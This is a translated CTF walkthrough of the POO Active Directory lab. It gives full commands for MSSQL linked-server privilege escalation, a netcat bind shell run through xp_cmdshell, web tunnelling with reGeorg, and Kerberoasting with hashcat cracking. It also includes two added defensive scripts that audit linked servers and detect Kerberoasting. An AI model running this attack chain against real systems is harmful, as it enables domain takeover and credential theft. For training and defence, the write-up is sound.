In this article we will go through not just a single machine, but an entire mini-lab from the platform.
As the description says, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise the host, escalate privileges and ultimately compromise the whole domain, collecting 5 flags along the way.
Connection to the lab is over VPN. It is recommended not to connect from a work computer or from a host that holds data important to you, because you end up on a private network together with people who know a thing or two about information security :)
Organizational information
To keep up with new articles, software and other information, I created
The information is provided for educational purposes only. The author of this document bears no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.
Start page
This endgame consists of two machines and has 5 flags.
A description and the addresses of the available hosts are also provided.
Let's begin!
Recon flag
The machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb
First, we scan the open ports. Since scanning all ports with nmap takes a long time, I do it with masscan. We scan all TCP and UDP ports from the tun0 interface at a rate of 500 packets per second.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Now, to get more detail about the services running on the ports, let's run a scan with the -A option.
nmap -A poo.htb -p80,1433
So we have IIS and MSSQL services. Along the way we get the real DNS name of the domain and the computer. On the web server we are greeted by the IIS home page.
Let's enumerate directories. I use gobuster for this. In the parameters we specify the number of threads, 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
This gives us HTTP authentication on the /admin directory, as well as an accessible .DS_Store file. .DS_Store is a file that stores custom folder attributes, such as the list of files, icon positions and the chosen background image. Such a file can end up in a web developer's web server directory. This way we get information about the contents of the directory. For this you can use the dsstore_crawler script:
python3 dsstore_crawler.py -i http://poo.htb/
We get the directory listing. The most interesting thing here is the /dev directory, in which we can see sources and db files in two branches. But we can only use the first 6 characters of the file and directory names if the service is vulnerable to IIS ShortName. You can check for this vulnerability using
And we find one file whose name starts with "poo_co". Not knowing what to do next, I simply selected all words starting with "co" from the wordlist.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
And we brute-force it with wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
And we find the right word! We look at this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).
We submit the flag and progress to 20%.
Huh flag
We connect to MSSQL; I use DBeaver.
We find nothing interesting in this database, so let's open the SQL Editor and look at the available users.
SELECT name FROM master..syslogins;
We have two users. Let's check our privileges.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
So, no privileges. Let's look at the linked servers; I wrote about this technique in detail
SELECT * FROM master..sysservers;
This is how we find another SQL Server. Let's try executing queries on this server using openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
And we can build a tree of queries.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
The point is that when we query a linked server, the query is executed in the context of a different user! Let's see which user context we are running under on the linked server.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Now let's see which context a query from the linked server back to ours runs under!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
So it is the dbo context, which should have full privileges. Let's check the privileges of a query coming from the linked server.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
As you can see, we have full privileges! Let's create our own admin. But openquery does not allow this, so we do it via EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
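From the defender's side, the weakness exploited in this section is a linked-server login mapping that hands out a more privileged identity than the caller has, combined with links that loop back to the same instance. The following audit script is an added example and is not part of the original writeup. It walks the hop graph that a DBA can export from sys.servers (name, data_source) joined with sys.linked_logins (local_principal_id, uses_self_credential, remote_name) and reports every chain of hops through which a given login ends up in a sysadmin context. The instance name "POO", the login names "external_user", "config_reader" and "sa", and the mapping layout are constructed for illustration; only the two link names are taken from the writeup.

```python
# Added example (not from the original writeup): audit of SQL Server linked-server
# login mappings for privilege-escalation chains of the kind shown above.
# Input rows mirror sys.servers (name, data_source) joined with sys.linked_logins
# (local_principal_id, uses_self_credential, remote_name); the instance name,
# link targets and login names below are constructed for illustration.
from collections import deque
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class LinkMapping:
    server: str                  # instance on which the linked server is defined
    link_name: str               # sys.servers.name
    target: str                  # sys.servers.data_source (instance the link points at)
    local_login: Optional[str]   # None = catch-all row (local_principal_id = 0)
    uses_self_credential: bool   # True = the caller's own identity is forwarded
    remote_name: Optional[str]   # fixed remote login when uses_self_credential is False


# Constructed configuration modelled on the two link names in the writeup:
# both links loop back to the same instance, and the PUBLIC link maps the
# account used by the CONFIG link onto a sysadmin login.
SAMPLE_MAPPINGS = [
    LinkMapping("POO", "COMPATIBILITYPOO_CONFIG", "POO", None, False, "config_reader"),
    LinkMapping("POO", "COMPATIBILITYPOO_PUBLIC", "POO", None, True, None),
    LinkMapping("POO", "COMPATIBILITYPOO_PUBLIC", "POO", "config_reader", False, "sa"),
]
SAMPLE_SYSADMINS = {("POO", "sa")}


def resolve_mapping(mappings, server, login, link_name):
    """Return the row that applies when `login` uses `link_name` on `server`.

    A login-specific row wins over the catch-all row; no row at all means the
    link cannot be used by that login."""
    specific = catch_all = None
    for m in mappings:
        if m.server != server or m.link_name != link_name:
            continue
        if m.local_login == login:
            specific = m
        elif m.local_login is None:
            catch_all = m
    return specific or catch_all


def loopback_links(mappings):
    """Links whose data source is the very instance they are defined on."""
    return sorted({(m.server, m.link_name) for m in mappings if m.target == m.server})


def find_escalation_paths(mappings, sysadmins, start_server, start_login):
    """Breadth-first walk over linked-server hops from one execution context.

    Returns every hop sequence (tuple of link names) that lands a non-sysadmin
    caller in a sysadmin context, together with that final (server, login)."""
    link_names = sorted({(m.server, m.link_name) for m in mappings})
    start = (start_server, start_login)
    seen = {start}
    queue = deque([(start, ())])
    paths = []
    while queue:
        (server, login), path = queue.popleft()
        for srv, name in link_names:
            if srv != server:
                continue
            m = resolve_mapping(mappings, server, login, name)
            if m is None:
                continue
            next_login = login if m.uses_self_credential else m.remote_name
            ctx = (m.target, next_login)
            if ctx in seen:
                continue
            seen.add(ctx)
            hop_path = path + (name,)
            if ctx in sysadmins and start not in sysadmins:
                paths.append((hop_path, ctx))
            queue.append((ctx, hop_path))
    return paths


if __name__ == "__main__":
    print("loop-back links:", loopback_links(SAMPLE_MAPPINGS))
    for hops, ctx in find_escalation_paths(SAMPLE_MAPPINGS, SAMPLE_SYSADMINS, "POO", "external_user"):
        print(" -> ".join(hops), "lands as", ctx)
```

On the sample data the script reports the two-hop chain CONFIG -> PUBLIC ending as "sa", which is exactly the shape of the escalation above. The fix on the SQL Server side is to map remote logins to the caller's own credentials (or to a least-privileged dedicated login) and to avoid loop-back links altogether; rerunning the audit after the change should return no paths.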
And now, connecting with the new user's credentials, we see the new flag database.
We submit this flag and move on.
BackTrack flag
Let's get a shell through MSSQL; I use mssqlclient from the impacket package.
mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC
We need to find credentials, and the first thing we ran into was the website. So we need the web server's configuration (it is not possible to simply drop a shell; a firewall is obviously running).
But access is denied. Although we can read the file from MSSQL, we first need to find out which languages are installed. And in the MSSQL directory we find that Python is present.
Then reading the web.config file is no problem.
-- Runs a Python snippet inside SQL Server (requires external scripts to be enabled);
-- the path is a raw Python string so the backslashes are not treated as escapes.
EXEC sp_execute_external_script
    @language = N'Python',
    @script = N'print(open(r''C:\inetpub\wwwroot\web.config'').read())';
With the credentials found, we go to /admin and take the flag.
Foothold flag
In fact, there are some difficulties with getting around the firewall, but looking at the network configuration we see that IPv6 is also in use!
Let's add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but this time over IPv6.
And the WinRM service is available over IPv6. Let's connect with the credentials we found.
There is a flag on the desktop; we submit it.
P00ned flag
After performing reconnaissance on the host, we use the command
setspn.exe -T intranet.poo -Q */*
Let's run the command via MSSQL.
This way we obtain the SPNs of the users p00_hr and p00_adm, which means they are susceptible to an attack such as Kerberoasting. In short, we can obtain their passwords.
First you need to get a stable shell as the MSSQL user. But since we are restricted, we can reach the host only on ports 80 and 1433. However, it is possible to tunnel traffic through port 80! For this we will use reGeorg.
But when we try to access it, we get a 404 error. This means that *.aspx files are not being processed. For files with this extension to be handled, we install ASP.NET 4.5 as follows.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
And now, when we access tunnel.aspx, we get a response that everything is ready to go.
Let's start the client part of the program, which will forward the traffic. We will forward all traffic from port 5432 to the server.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
And we use proxychains to send any application's traffic through our proxy. Let's add this proxy to the /etc/proxychains.conf config file.
Now let's upload the program to the server.
Now we start the listener via MSSQL.
xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321
And we connect through our proxy.
proxychains rlwrap nc poo.htb 4321
And let's grab the hashes.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -ErrorAction SilentlyContinue -OutputFormat Hashcat | Select-Object Hash | Out-File -FilePath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Now these hashes need to be cracked. Since the rockyou wordlist does not contain these passwords, I used ALL the password lists shipped in SecLists. For cracking we use hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
And we get both passwords: the first from the dutch_passwordlist.txt wordlist and the second from Keyboard-Combinations.txt.
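The Kerberoasting step above leaves a clear trace on the domain controller: a burst of TGS requests (Security event 4769) for several user-account SPNs with the RC4 ticket encryption type (0x17, the etype 23 that hashcat mode 13100 cracks), all from one client in a short time. The detector below is an added example and not part of the original writeup; it runs over constructed 4769 records whose field names follow the real event data (TargetUserName, ServiceName, TicketEncryptionType, IpAddress), while the timestamps, addresses and the requesting account names are made up.

```python
# Added example (not from the original writeup): detection logic for the
# Kerberoasting pattern shown above, run over constructed Windows Security
# event 4769 (Kerberos service ticket request) records. Field names follow
# the 4769 event data; timestamps, addresses and account names are made up.
from collections import defaultdict
from datetime import datetime, timedelta

# Ticket encryption type that exposes the service account's NT hash to
# offline cracking (etype 23, "0x17" in the event data).
RC4_HMAC = "0x17"

SAMPLE_4769 = [
    # AES ticket for a machine account: normal traffic, must not be flagged
    {"TimeCreated": "2020-05-10T14:02:11", "TargetUserName": "svc_backup@INTRANET.POO",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.20"},
    # burst of RC4 tickets for two user-account SPNs from one client (constructed)
    {"TimeCreated": "2020-05-10T14:03:05", "TargetUserName": "jdoe@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    {"TimeCreated": "2020-05-10T14:03:06", "TargetUserName": "jdoe@INTRANET.POO",
     "ServiceName": "p00_adm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    # krbtgt requests are TGT renewals, not roastable service tickets
    {"TimeCreated": "2020-05-10T14:03:07", "TargetUserName": "jdoe@INTRANET.POO",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11"},
    # a single RC4 request from another client: below the threshold
    {"TimeCreated": "2020-05-10T15:40:00", "TargetUserName": "alice@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.30"},
]


def is_roastable_request(ev):
    """RC4 service ticket for a user account (not krbtgt, not a machine account)."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))


def detect_kerberoast(events, window=timedelta(minutes=10), min_services=2):
    """Flag a (client, requester) pair that asks for RC4 tickets to at least
    `min_services` distinct user SPNs inside one sliding time window."""
    by_client = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            key = (ev["IpAddress"], ev["TargetUserName"])
            by_client[key].append((datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    alerts = []
    for (ip, requester), reqs in by_client.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            # slide the window start forward until it fits inside `window`
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= min_services:
                alerts.append({
                    "client": ip,
                    "requester": requester,
                    "services": sorted(services),
                    "first_seen": reqs[start][0].isoformat(),
                    "last_seen": reqs[end][0].isoformat(),
                })
                break  # one alert per requester is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769):
        print(f"{alert['requester']} from {alert['client']} requested RC4 tickets for "
              f"{', '.join(alert['services'])} between {alert['first_seen']} and {alert['last_seen']}")
```

The threshold of two distinct SPNs matches this lab, where only p00_hr and p00_adm carry SPNs; in a real domain you would raise it and tune the window to the size of the environment. Mitigation is independent of detection: configure service accounts for AES only (msDS-SupportedEncryptionTypes) so that no RC4 ticket is issued, and give them long random passwords or use group Managed Service Accounts, which makes the offline cracking step above impractical.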
And so we have three users; let's go after the domain controller. First we find its address.
Great, we have the domain controller's IP address. Let's find all domain users and which of them is an administrator. To gather this information, download the PowerView.ps1 script. Then we connect with evil-winrm, specifying the directory containing the script in the -s parameter. Then we simply import the PowerView script.
Now we have access to all of its functions. The user p00_adm looks like a privileged user, so we will work in their context. Let's create a PSCredential object for this user.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Now every PowerShell command in which we specify $Creds will be executed as p00_adm. Let's display the list of users together with the AdminCount attribute.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
And so our user really is privileged. Let's see which groups they belong to.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Finally, we confirm that the user is a domain administrator. This gives them the right to log on to the domain controller remotely. Let's try to log in over WinRM through our tunnel. I was put off by the errors reGeorg produced when used with evil-winrm.
So let's use another, simpler one,
We try to connect, and we are in the system.
But there is no flag. So we look at the users and check their desktops.
We find the flag on mr3ks and the lab is 100% complete.
That's all. As feedback, please comment on whether you learned something new from this article and whether it was useful to you.
You can join us on
Source: www.habr.com